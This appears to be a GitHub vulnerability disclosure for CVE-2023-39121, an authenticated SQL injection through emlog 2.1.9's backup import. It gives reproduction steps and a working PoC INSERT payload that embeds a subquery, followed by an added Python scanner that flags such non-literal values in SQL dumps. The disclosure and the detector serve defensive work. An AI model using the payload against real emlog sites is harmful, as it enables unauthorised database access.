
CVE-2023-39121: There is sql injection in the background of emlog 2.1.9. · Issue #1 · safe-b/CVE

emlog v2.1.9 was discovered to contain a SQL injection vulnerability via the component /admin/user.php.

  1. Log in to the administrator's back-end home page, go to System -> Data and click Start Backup to obtain an SQL file.
    http://127.0.0.1/emlog/admin/data.php
  2. Modify the SQL file, adding a line that inserts a row into the user table of the database.

    POC:
    INSERT INTO emlog_user VALUES('110','','$P$BnTaZnToynOoAVP6T/MiTsZc9ZAQNg.',(select user()),'writer','n','','[email protected]','','','0','1687261845','1687261845');
  3. Save the SQL file, then select Import SQL file, choose the file you just modified and click Import. If the import succeeds, a success message is displayed. Then open the User module:
    http://127.0.0.1/emlog/admin/user.php
    You will find that the SQL statement has been executed successfully.
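
A defender-side check for the import step described above, as an added example that is not part of the original issue or of emlog's code: it scans a backup SQL file before import and reports every INSERT value that is not a plain literal, such as the `(select user())` expression in the PoC. The function names, the `emlog_demo` table and the sample rows are constructed for illustration.

```python
import re

# In a data-only dump every value should be a quoted string, a number or NULL.
LITERAL = re.compile(r"^(?:'(?:[^'\\]|\\.|'')*'|-?\d+(?:\.\d+)?|NULL)$", re.I | re.S)
INSERT = re.compile(r"INSERT\s+INTO\s+`?(\w+)`?\s*(?:\([^)]*\)\s*)?VALUES\s*", re.I)

def split_values(sql, pos):
    """Yield each top-level value of the row tuples from sql[pos] up to ';'."""
    depth, start, quoted, i = 0, pos, False, pos
    while i < len(sql):
        ch = sql[i]
        if quoted:
            if ch == "\\" or sql[i:i + 2] == "''":
                i += 1                    # escaped char or doubled quote
            elif ch == "'":
                quoted = False
        elif ch == "'":
            quoted = True
        elif ch == "(":
            depth += 1
            if depth == 1:
                start = i + 1             # first value of a new row tuple
        elif ch == ")":
            depth -= 1
            if depth == 0:
                yield sql[start:i].strip()
        elif ch == "," and depth == 1:
            yield sql[start:i].strip()
            start = i + 1
        elif ch == ";" and depth == 0:
            return                        # end of this INSERT statement
        i += 1

def audit_dump(sql):
    """Return (line, table, expression) for each INSERT value that is not a literal."""
    findings = []
    for m in INSERT.finditer(sql):
        line = sql.count("\n", 0, m.start()) + 1
        for value in split_values(sql, m.end()):
            if not LITERAL.match(value):
                findings.append((line, m.group(1), value))
    return findings

# Constructed sample dump; table layouts and hashes are placeholders.
SAMPLE = """\
INSERT INTO emlog_user VALUES('1','admin','<hash>','admin','admin','n','1687000000');
INSERT INTO emlog_user VALUES('110','','<hash>',(select user()),'writer','n','1687261845');
INSERT INTO emlog_demo VALUES('1','title','it''s (a) blog, really');
"""
```

Calling `audit_dump(SAMPLE)` flags only the second row; quoted strings that merely contain parentheses or commas pass.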
